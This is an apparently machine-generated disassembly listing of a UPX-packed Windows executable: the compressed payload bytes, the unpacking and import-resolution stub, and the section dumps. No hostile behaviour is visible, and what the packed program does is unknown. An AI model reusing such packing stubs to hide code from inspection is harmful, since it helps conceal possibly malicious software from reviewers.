dd 45500017h, 4014CE7h, 61933800h, 6CD67B46h, 200E0FFh
dd 8010B01h, 130C1E0Ch, 5B042950h, 10AEBECEh, 400D3003h
dd 3304020Bh, 59BA4B6h, 1E600C07h, 766C978Bh, 6072B10h
dd 2C907281h, 3C32502Fh, 805D6450h, 0A701DCE4h, 0B05F1E1Ch
dd 742E0FCDh, 1B747865h, 4EB901Dh, 617771B6h, 2ECD2023h
dd 61276472h, 17D85DFBh, 2302FEE4h, 2402722h, 2D7BB3Bh
dd 1C10262Eh, 0B9F27302h, 0C016DD6Fh, 6F6C654Fh, 504F5B63h
dd 0C94DFB6h, 0A81B4226h, 4A2332h, 327F0000h, 80000051h
dd 0FF000004h, 0
; =============== S U B R O U T I N E =======================================
public start
start proc near
var_AC = byte ptr -0ACh
pusha
mov esi, offset dword_406000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_4071E2
; ---------------------------------------------------------------------------
align 8
loc_4071D8: ; CODE XREF: start:loc_4071E9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_4071DE: ; CODE XREF: start+B6�j start+CD�j
add ebx, ebx
jnz short loc_4071E9
loc_4071E2: ; CODE XREF: start+10�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4071E9: ; CODE XREF: start+20�j
jb short loc_4071D8
mov eax, 1
loc_4071F0: ; CODE XREF: start+3F�j start+4A�j
add ebx, ebx
jnz short loc_4071FB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4071FB: ; CODE XREF: start+32�j
adc eax, eax
add ebx, ebx
jnb short loc_4071F0
jnz short loc_40720C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_4071F0
loc_40720C: ; CODE XREF: start+41�j
xor ecx, ecx
sub eax, 3
jb short loc_407220
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_407292
mov ebp, eax
loc_407220: ; CODE XREF: start+51�j
add ebx, ebx
jnz short loc_40722B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40722B: ; CODE XREF: start+62�j
adc ecx, ecx
add ebx, ebx
jnz short loc_407238
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_407238: ; CODE XREF: start+6F�j
adc ecx, ecx
jnz short loc_40725C
inc ecx
loc_40723D: ; CODE XREF: start+8C�j start+97�j
add ebx, ebx
jnz short loc_407248
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_407248: ; CODE XREF: start+7F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_40723D
jnz short loc_407259
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_40723D
loc_407259: ; CODE XREF: start+8E�j
add ecx, 2
loc_40725C: ; CODE XREF: start+7A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_40727C
loc_40726D: ; CODE XREF: start+B4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_40726D
jmp loc_4071DE
; ---------------------------------------------------------------------------
align 4
loc_40727C: ; CODE XREF: start+AB�j start+C9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_40727C
add edi, ecx
jmp loc_4071DE
; ---------------------------------------------------------------------------
loc_407292: ; CODE XREF: start+5C�j
pop esi
mov edi, esi
mov ecx, 0A4h
loc_40729A: ; CODE XREF: start+E1�j start+E6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_40729F: ; CODE XREF: start+104�j
cmp al, 1
ja short loc_40729A
cmp byte ptr [edi], 1
jnz short loc_40729A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov al, bl
loop loc_40729F
lea edi, [esi+5000h]
loc_4072CC: ; CODE XREF: start+12E�j
mov eax, [edi]
or eax, eax
jz short loc_40730E
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+703Ch]
xchg eax, ebp
loc_4072E9: ; CODE XREF: start+146�j
mov al, [edi]
inc edi
or al, al
jz short loc_4072CC
mov ecx, edi
push edi
dec eax
repne scasb
push ebp
call dword ptr [esi+7040h]
or eax, eax
jz short loc_407308
mov [ebx], eax
add ebx, 4
jmp short loc_4072E9
; ---------------------------------------------------------------------------
loc_407308: ; CODE XREF: start+13F�j
call dword ptr [esi+7048h]
loc_40730E: ; CODE XREF: start+110�j
add edi, 4
lea ebx, [esi-4]
loc_407314: ; CODE XREF: start+170�j
xor eax, eax
mov al, [edi]
inc edi
or eax, eax
jz short loc_40733F
cmp al, 0EFh
ja short loc_407332
loc_407321: ; CODE XREF: start+17D�j
add ebx, eax
mov eax, [ebx]
xchg al, ah
rol eax, 10h
xchg al, ah
add eax, esi
mov [ebx], eax
jmp short loc_407314
; ---------------------------------------------------------------------------
loc_407332: ; CODE XREF: start+15F�j
and al, 0Fh
shl eax, 10h
mov ax, [edi]
add edi, 2
jmp short loc_407321
; ---------------------------------------------------------------------------
loc_40733F: ; CODE XREF: start+15B�j
mov ebp, [esi+7044h]
lea edi, [esi-1000h]
mov ebx, 1000h
push eax
push esp
push 4
push ebx
push edi
call ebp
lea eax, [edi+1EFh]
and byte ptr [eax], 7Fh
and byte ptr [eax+28h], 7Fh
pop eax
push eax
push esp
push eax
push ebx
push edi
call ebp
pop eax
popa
lea eax, [esp+2Ch+var_AC]
loc_407373: ; CODE XREF: start+1B7�j
push 0
cmp esp, eax
jnz short loc_407373
sub esp, 0FFFFFF80h
jmp sub_402950
start endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00008000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
UPX2 segment para public 'DATA' use32
assume cs:UPX2
;org 408000h
dd 3 dup(0)
dd 8058h, 803Ch, 3 dup(0)
dd 8065h, 8050h, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E6169Ah, 77E75CB5h, 0
aJW db 'jÉÔw',0
align 4
aKernel32_dll db 'KERNEL32.DLL',0
aUser32_dll db 'USER32.dll',0
dd 6F4C0000h, 694C6461h, 72617262h, 4179h, 50746547h, 41636F72h
dd 65726464h, 7373h, 74726956h, 506C6175h, 65746F72h, 7463h
dd 74697845h, 636F7250h, 737365h, 73770000h, 6E697270h
dd 416674h, 7000h, 0Ch, 31C2h, 3CFh dup(0)
UPX2 ends
; Section 4. (virtual address 00009000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00009000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 409000h
align 2000h
_idata2 ends
end start